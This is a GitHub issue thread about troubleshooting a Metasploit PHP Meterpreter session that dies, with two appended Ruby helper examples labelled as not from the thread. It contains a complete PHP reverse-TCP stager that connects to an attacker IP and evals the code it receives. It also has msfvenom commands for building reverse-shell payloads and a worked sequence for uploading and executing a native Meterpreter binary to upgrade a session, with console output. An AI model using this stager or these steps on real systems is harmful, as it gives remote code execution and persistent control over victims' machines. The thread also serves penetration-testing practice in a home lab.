Closed githubnan123 closed 7 years ago
I can't say for sure, but this reminds me of: https://github.com/rapid7/metasploit-payloads/issues/95
Hi @wchen-r7, I do not really know, because the connection does get established successfully and stays up for some seconds, so not AS SOON as the session is found... But what about the commands? I mean, how can I not have the "normal" commands like screenshot and sysinfo? Thanks for your time
And did you fix your issue by updating your PHP version? Just to verify.
PHP meterpreter doesn't necessarily have all the commands you see in Windows meterpreter. Personally, I would suggest you upgrade to a platform-specific meterpreter (such as Windows or Linux) as soon as you get a session with the PHP meterpreter, in order to access more functionality.
My concern is more on the session dying part. I will at least try to see if I can reproduce this. I will let you know. Thanks!
Well thanks!! But if you get it reproduced, can you then answer these questions:
Thanks! I really appreciate your time :))
I can answer 1 and 3 for you now.
For question 1, normally it should not be downloading the file. If it does, that tells me the web server is probably serving the browser some kind of inappropriate content type header? This may not be a big issue though as long as the web server is parsing PHP code. If you see the PHP code from the browser, then that's bad.
For question 3, um... well, this requires the session to stay alive first. I normally just generate an executable from msfvenom (for example: ./msfvenom -p linux/meterpreter/reverse_tcp LHOST=[MY IP] LPORT=4444 -f elf -o payload.bin ), use the upload command to upload this binary to a directory you can write to, and then use the execute command to run it.
There is definitely more than one way to upgrade. If you are attacking Windows, you can also use the exploits/multi/script/web_delivery to upgrade to a different meterpreter.
1 tends to mean that the target web server isn't configured to run .php files with the PHP interpreter. This will happen if you upload a .php file to an IIS server running .NET, for example.
Well, at least it seems to work even though the browser is downloading the content (I am using Chrome on the victim machine). @OJ you mentioned something about configuring the server to run PHP? I simply uploaded the file to /var/www/html/ on my Linux. Should that not work?
@wchen-r7, is this a good answer to 3 - http://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/ ?
(Reminder: I am not asking you because I am too lazy to try it, I am just not home yet.)
The content of the generated .php file located in www/html/ is:
/*<?php /**/
error_reporting(0);
$ip = '192.168.0.186';
$port = 6666;
// Pick whichever socket API this PHP build exposes.
if (($f = 'stream_socket_client') && is_callable($f)) {
    $s = $f("tcp://{$ip}:{$port}");
    $s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
    $s = $f($ip, $port);
    $s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
    $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
    $res = @socket_connect($s, $ip, $port);
    if (!$res) { die(); }
    $s_type = 'socket';
} else {
    die('no socket funcs');
}
if (!$s) { die('no socket'); }
// The handler first sends the stage length as a 4-byte big-endian integer.
switch ($s_type) {
    case 'stream': $len = fread($s, 4); break;
    case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) { die(); }
$a = unpack("Nlen", $len);
$len = $a['len'];
// Read until the whole stage has arrived, then hand the socket to it and run it.
$b = '';
while (strlen($b) < $len) {
    switch ($s_type) {
        case 'stream': $b .= fread($s, $len-strlen($b)); break;
        case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
    }
}
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
Thanks so much for your time!!
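Added example, not code from this thread and not Metasploit's own code: the framing that the PHP stager posted above expects from the handler, re-implemented in Ruby so it can be run offline. The stager reads 4 bytes, unpacks them as a big-endian unsigned int (PHP unpack("Nlen") is Ruby unpack('N')), keeps reading until it has that many bytes, and eval()s the result. The sample stage string is constructed for the example; the function names are mine.

```ruby
require 'socket'
require 'stringio'

# Handler side: prefix the stage with its byte length, big-endian, 4 bytes.
def frame_stage(stage)
  [stage.bytesize].pack('N') + stage.b
end

# Stager side: mirror of the PHP read loop. +io+ may be a socket or a StringIO.
# Returns the stage, or nil if the length header or the body is truncated
# (the PHP version just die()s in those cases).
def read_stage(io, chunk_size = 4096)
  header = io.read(4)
  return nil if header.nil? || header.bytesize < 4
  len = header.unpack('N').first
  stage = ''.b
  while stage.bytesize < len
    piece = io.read([len - stage.bytesize, chunk_size].min)
    break if piece.nil? || piece.empty?   # peer closed before the full stage arrived
    stage << piece
  end
  stage.bytesize == len ? stage : nil
end

# Stand-in for the handler's behaviour towards *any* client that connects:
# it never inspects what the client sent, it just writes the framed stage.
# This is what a browser pointed at the handler port receives; the bytes are
# not an HTTP response, so the browser saves them as a file.
# Binds to a free localhost port and serves one client; returns [port, thread].
def start_stage_server(stage, host = '127.0.0.1')
  server = TCPServer.new(host, 0)     # port 0: let the OS pick a free port
  port = server.addr[1]
  thread = Thread.new do
    client = server.accept
    client.write(frame_stage(stage))
    client.close
    server.close
  end
  [port, thread]
end
```

To watch it live, call start_stage_server with a constructed stage string, open a TCPSocket to 127.0.0.1 on the returned port, and pass that socket to read_stage; the bytes come back exactly as framed, whatever the client wrote first.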
@nichlaspro That script is good for upgrading from a shell to a Meterpreter. You actually have a different scenario: You're switching from Meterpreter to Meterpreter.
You cannot go from meterpreter to meterpreter, right? :/ That just confused me a little... In the videos I have seen about going from shell to meterpreter, they end up having the commands available like screenshot, which is what I want too.
Update: Ahhh, I currently only have php-meterpreter, and what I need is a platform-specific meterpreter in order to make the wanted commands available; I think I got the point now! But how can I upload another payload using that PHP client? I mean, I have used PHP and not exe for a reason. What I can think of would be to make an exe payload using windows/meterpreter, but php/meterpreter does not have any commands that can upload it to the victim PC and execute it, so kind of hard to get it to work, I think...
Hi @nichlaspro, I tried to look into this issue, and I'm not reproducing the problem.
The following log shows what I did. Basically, I got a session with php/meterpreter/reverse_tcp, and I waited for about 2 minutes:
msf exploit(handler) > date
[*] exec: date
Thu Dec 1 15:38:07 CST 2016
msf exploit(handler) > curl -s http://192.168.146.184/test.php
[*] exec: curl -s http://192.168.146.184/test.php
[*] Sending stage (34117 bytes) to 192.168.146.184
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.184:54134) at 2016-12-01 15:38:17 -0600
^CInterrupt: use the 'exit' command to quit
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux www-data (33) @ sinn3r-virtual-machine 192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)
msf exploit(handler) > date
[*] exec: date
Thu Dec 1 15:40:02 CST 2016
msf exploit(handler) >
However, just because I'm not able to reproduce, doesn't mean the bug doesn't exist. If you'd like, please provide me with some target info, such as: OS, version of the OS, what web server, PHP version, etc. So I can recreate the test environment as close as possible.
@nichlaspro Also, here is an example of how you could switch from a PHP meterpreter shell to a Linux native. I'll be using 192.168.146.1 as an example for the attacker's IP:
./msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.146.1 lport=4444 -f elf -o elf.bin
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux www-data (33) @ sinn3r-virtual-machine 192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)
meterpreter > cd /tmp
meterpreter > upload elf.bin
[*] uploading : elf.bin -> elf.bin
[*] uploaded : elf.bin -> elf.bin
meterpreter > execute -f "chmod +x elf.bin"
meterpreter > execute -f "/tmp/elf.bin"
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
Process 6032 created.
[*] Sending stage (1495599 bytes) to 192.168.146.184
[*] Meterpreter session 2 opened (192.168.146.1:4444 -> 192.168.146.184:54136) at 2016-12-01 15:46:41 -0600
meterpreter >
The second session should be the native meterpreter:
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux www-data (33) @ sinn3r-virtual-machine 192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)
2 meterpreter x86/linux uid=33, gid=33, euid=33, egid=33, suid=33, sgid=33 @ sinn3r-virtual-machine 192.168.146.1:4444 -> 192.168.146.184:54136 (192.168.146.184)
Also, please note that since we are on a bug tracking system, in here we need to stay on topic for the bug (of your session dying). If you need further training on Metasploit, please use our community website, where there is also Metasploit devs assisting. Thanks! :-)
Hi again! Thank you so much - now I have an idea about how to upgrade the shell, but look. I will now show you exactly what I do:
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=4444 R > /root/Desktop/thisisphp.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 949 bytes
root@kali:~# mv /root/Desktop/thisisphp.php /var/www/html/
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.13.1-dev ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.186:4444
[*] Starting the payload handler...
[*] Sending stage (34117 bytes) to 192.168.0.186
[*] Meterpreter session 1 opened (192.168.0.186:4444 -> 192.168.0.186:35456) at 2016-12-02 09:11:46 -0500
meterpreter > sessions
[-] Unknown command: sessions.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.186 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.186:4444
[*] Starting the payload handler...
[*] Sending stage (34117 bytes) to 192.168.0.197
[*] Meterpreter session 2 opened (192.168.0.186:4444 -> 192.168.0.197:49625) at 2016-12-02 09:13:58 -0500
[*] Sending stage (34117 bytes) to 192.168.0.197
meterpreter > cd
[-] Unknown command: cd.
meterpreter > cd /tmp
[-] Unknown command: cd.
[-] Meterpreter session 2 is not valid and will be closed
[*] 192.168.0.197 - Meterpreter session 2 closed.
meterpreter >
So here are my final questions (I guess) that cover the still ongoing issues.
On my Windows PC it is downloading the file instead of just showing the content, and I have to type the port in order to even make it start downloading. Is that optimal? Look: https://s18.postimg.org/4hkabwxjt/look.png
So now the download of the PHP has started and a meterpreter session has been opened, but again it was only up for about 10-20 seconds before it closed. Can that have something to do with this weirdness upon connecting to the PHP file on my Windows PC? How can I fix this then?
As you can see, I tried to use the cd command in the meterpreter, but then it said that it is an unknown command? I am really doing the exact same thing as other people, but it just does not seem to work? (sad story)
Something looks very wrong to me, can you help? That would really make my day :) (I am using Chrome on my Windows 8 machine and PHP version 7.0.12-1 on my Linux; btw I have not started any services or anything.) Thanks, your time is much appreciated
Hi @nichlaspro,
For question 1: The URL looks a little weird to me. You are connecting to http://192.168.0.186:4444/thisisphp.php .... so does that mean your web server is listening on port 4444? Normally web servers listen on port 80, so you would call your PHP meterpreter like this: http://192.168.0.186/thisisphp.php . Could you please clarify on that a little?
For question 2: I don't know for sure, because I'm unable to reproduce this problem. It works fine on my end, and I also tested it on PHP 7. Is it possible you're not on the latest master? Could you please try git clone https://github.com/rapid7/metasploit-framework.git and use that Metasploit Framework instead? That should give you the latest.
For question 3: Yeah, so when you receive a meterpreter connection, framework has to load stdapi to get the commands. That looks like it didn't. That means the session was not valid for some reason. I think if question 2 is resolved, we should automatically resolve question 3 as well.
Okay, first of all, thank you so much for taking the time to help me! I know that it is not optimal that I have to write the port in the victim browser, but whenever I do that the browser starts downloading the actual PHP file. When I do type 192.168.0.186/payloaddd.php in the victim browser, it says "This site can't be reached". Like if there is some sort of issue in making the PHP file reachable. I have moved the generated PHP file to /var/www/, which I think is what you should do, but it does not seem to work.
I tried updating the metasploit framework, but it did not really seem to help much. Here is what I did:
root@kali:~# clone https://github.com/rapid7/metasploit-framework.git
bash: clone: command not found
root@kali:~# git clone https://github.com/rapid7/metasploit-framework.git
Cloning into 'metasploit-framework'...
remote: Counting objects: 382032, done.
remote: Compressing objects: 100% (99/99), done.
remote: Total 382032 (delta 45), reused 1 (delta 1), pack-reused 381932
Receiving objects: 100% (382032/382032), 282.55 MiB | 5.73 MiB/s, done.
Resolving deltas: 100% (277211/277211), done.
root@kali:~# sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=4444 R>payloaddd.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 949 bytes
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.13.1-dev ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set URIPATH /upload/payloaddd.php
URIPATH => /upload/payloaddd.php
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.186:4444
[*] Starting the payload handler...
[-] Exploit failed: Interrupt
[*] Exploit completed, but no session was created.
msf exploit(handler) > set uripath /
uripath => /
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.186:4444
[*] Starting the payload handler...
So nothing happened from then on, because when I typed in 192.168.0.186/payloaddd.php in the victim browser, it said "This site can't be reached". But when I typed 192.168.0.186:4444/payloaddd.php, the browser started downloading a PHP file, and this is where the invalid session thing begins, I think. Anyway, when I start msfconsole it says:
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
Can that have anything to do with why it is not working? Update to the last part: Just found out that it said "failed to connect" when starting msfconsole because I had not started the postgresql service... Anyway, that does not solve the problem about PHP and all that.
Hi @nichlaspro, after you clone Metasploit Framework, make sure you cd to the directory, and then execute ./msfconsole , and not msfconsole . I suspect there are two different Frameworks installed on the machine.
You are right, there are two. Let me just try to fix some installation errors and then I will see what the outcome is :)))
Okay, so I successfully installed it and mounted it from home/metasploit-framework and then ran ./msfconsole. Then I set up the LHOST and port, payload, and exploited... but now I tried it on the actual attacker machine (Linux), where I typed the URL 192.168.0.186/payloaddd.php and Firefox said this
Unable to connect
Firefox can't establish a connection to the server at 192.168.0.186. The site could be temporarily unavailable or too busy. Try again in a few moments. If you are unable to load any pages, check your computer's network connection. If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.
Again, the payload PHP file is located in /var/www/. What is going on?
What I did:
Use `bundle show [gemname]` to see where a bundled gem is installed.
Post-install message from aruba:
Use on ruby 1.8.7
* Make sure you add something like that to your `Gemfile`. Otherwise you will
get cucumber > 2 and this will fail on ruby 1.8.7
gem 'cucumber', '~> 1.3.20'
With aruba >= 1.0 there will be breaking changes. Make sure to read https://github.com/cucumber/aruba/blob/master/History.md for 1.0.0
root@kali:~/metasploit-framework# ./msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.13.4-dev-f45b0e3 ]
+ -- --=[ 1607 exploits - 914 auxiliary - 276 post ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler/
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.186:4444
[*] Starting the payload handler...
Thanks again
@nichlaspro The reason you are able to connect to 4444 is because that is the port the handler is listening on. When you connect to it, the handler assumes that it has been contacted by the stager and gives you the meterpreter stage. This is not what you want.
First thing you need to verify is that you are actually able to connect to the web server. Make sure you can connect to http://192.168.0.186. You should receive something like "It works!" or a GET request in the HTTP server log. When that is done, placing the PHP file in the /var/www/ directory and calling it from the browser is straightforward.
If you are not able to connect to the web server in the first place, I am afraid it is not a Metasploit issue but rather something related to your web server setup.
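Added example, not part of this thread and not Metasploit's own code: a checker for the question that keeps coming up above (is the web server executing the .php file, handing it back as a download, or is the browser actually talking to the handler on 4444?). It fetches the payload URL over a raw socket, so a reply that is not HTTP at all can be recognised, and classifies what came back. The function names, the return symbols and the sample responses used to exercise it are mine; host, port and path are whatever you pass in.

```ruby
require 'socket'

PHP_OPEN_TAG = '<?php'.freeze

# One bare HTTP/1.0 GET; returns the raw bytes received within +timeout+ seconds.
# A stager that executes connects back to the handler and may never answer the
# browser, so an empty reply after the timeout is itself a signal (see below).
def fetch_raw(host, port, path, timeout: 5)
  sock = TCPSocket.new(host, port)
  sock.write("GET #{path} HTTP/1.0\r\nHost: #{host}\r\nConnection: close\r\n\r\n")
  raw = ''.b
  deadline = Time.now + timeout
  while (remaining = deadline - Time.now) > 0
    break unless IO.select([sock], nil, nil, remaining)
    chunk = sock.read_nonblock(65_536, exception: false)
    break if chunk.nil?                 # EOF
    next if chunk == :wait_readable
    raw << chunk
  end
  raw
ensure
  sock&.close
end

# Classify the raw bytes of a reply to GET /payload.php. Returns one of:
#   :handler_port  not an HTTP response, but it contains PHP: you connected to
#                  the Metasploit handler, which sends [4-byte length][PHP stage]
#                  to anything that connects (this is what a browser pointed at
#                  :4444 "downloads")
#   :not_http      not an HTTP response and no PHP in it either
#   :not_found     404: the file is not under the document root this server uses
#   :raw_source    the server returned the PHP source itself, i.e. .php is not
#                  wired to the interpreter (Apache without mod_php commonly serves
#                  it as application/x-httpd-php, which browsers save as a file)
#   :executed      2xx with no PHP source in the body: the interpreter ran it
#   :no_reply      nothing came back before the timeout; with a reverse_tcp stager
#                  that usually means it ran and is blocked on the callback, so
#                  look at the handler for a session
#   :other         any other status
def classify_response(raw)
  return :no_reply if raw.nil? || raw.empty?
  unless raw.start_with?('HTTP/')
    return raw.include?(PHP_OPEN_TAG) ? :handler_port : :not_http
  end
  head, body = raw.split("\r\n\r\n", 2)
  status = head.lines.first.split(' ')[1].to_i
  headers = {}
  head.lines.drop(1).each do |line|
    name, value = line.split(':', 2)
    headers[name.strip.downcase] = value.to_s.strip if value
  end
  ctype = headers['content-type'].to_s.downcase
  return :not_found if status == 404
  return :raw_source if body.to_s.include?(PHP_OPEN_TAG) ||
                        ctype.include?('x-httpd-php') ||
                        ctype.include?('application/octet-stream')
  return :executed if (200..299).cover?(status)
  :other
end

# Convenience wrapper, e.g. check_payload_url('192.168.0.186', 80, '/test.php').
# Note the web server port (80), not the handler port (4444).
def check_payload_url(host, port, path, timeout: 5)
  classify_response(fetch_raw(host, port, path, timeout: timeout))
rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH, SocketError
  :unreachable   # "This site can't be reached": nothing is listening there
end
```

Run check_payload_url against port 80 first; :unreachable or :not_found means the web server, not Metasploit, is the thing to fix, and :raw_source means PHP is not installed or not enabled for that server, so nothing will ever connect back to the handler.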
How to mark this as solved?
just click "Close" where you respond.
Closed for ya :-)
Steps to reproduce
How'd you do it?
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=443 -f raw > /root/var/www/html/test.php
msfconsole
use exploit/multi/handler / set payload php/meterpreter/reverse_tcp
set LHOST 192.168.0.186 / set LPORT 443
exploit
Then the victim (192.168.0.197) connects to 192.168.0.186:443/test.php. Btw, is the victim PC supposed to start a download? Because whenever I connect to this site, the PC starts downloading "test.php"
Expected behavior
What should happen? I should see the connection and be able to use commands like sysinfo and screenshot etc. The session should probably last longer than 15 sec :/
Current behavior
I DO see a new session and it opens, but here are the issues: I do not have the normal meterpreter commands like screenshot, sysinfo etc. but these instead: Core Commands =============
And the session only lasts for about 15 sec (my focus is still on the meterpreter commands). It says Meterpreter session .. closed. Reason: Died all the time too. And then I wanted to see what would happen if I used the command machine_id, but then it said that it failed because the current session is closed, and that was after 5 sec... Anyway, I am still most concerned about why I do not have the "normal" meterpreter commands.
System stuff
Kali Linux 2016.2
Metasploit version
4.13.1-dev
How can I fix this? Thanks! Help is much appreciated!!